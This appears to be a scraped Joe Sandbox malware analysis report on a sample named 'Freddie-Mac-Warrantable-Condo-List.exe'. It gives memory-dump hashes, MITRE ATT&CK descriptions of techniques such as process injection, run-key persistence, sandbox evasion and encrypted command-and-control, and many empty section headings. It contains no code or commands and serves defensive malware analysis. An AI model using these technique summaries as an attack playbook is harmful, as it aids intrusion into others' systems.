Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c66dfd443e45d2dc7391b312a0230613fd2c36637f464bca73f14c28698e5c3b
Instruction ID: 300a16441cbc0e02c209439b571b06748193695fc522a732ad033c7b69861279
Opcode Fuzzy Hash: c66dfd443e45d2dc7391b312a0230613fd2c36637f464bca73f14c28698e5c3b
Instruction Fuzzy Hash: 7AB09B36B0401CC79A14555D74450DDF375F6C45277504177D51A91081CB3549254754

Uniqueness

Uniqueness Score: -1.00%

Function 07FCFB90, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.437953490.0000000007FC0000.00000040.00000001.sdmp, Offset: 07FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7fc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 235d115aaf674828f02c514a888d4c942753dfcbfeee290fe8f73f9e7d9513c5
Instruction ID: 33511b8621cbcbab74964c9f46ba20a9430ae5ddfcf447873a97b90292e5e65c
Opcode Fuzzy Hash: 235d115aaf674828f02c514a888d4c942753dfcbfeee290fe8f73f9e7d9513c5
Instruction Fuzzy Hash: 30A0223000032C8BC30023B03C08A8C330CA080A003808028F20CCBA008F32E00000F0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Freddie-Mac-Warrantable-Condo-List.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Dropped Files

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre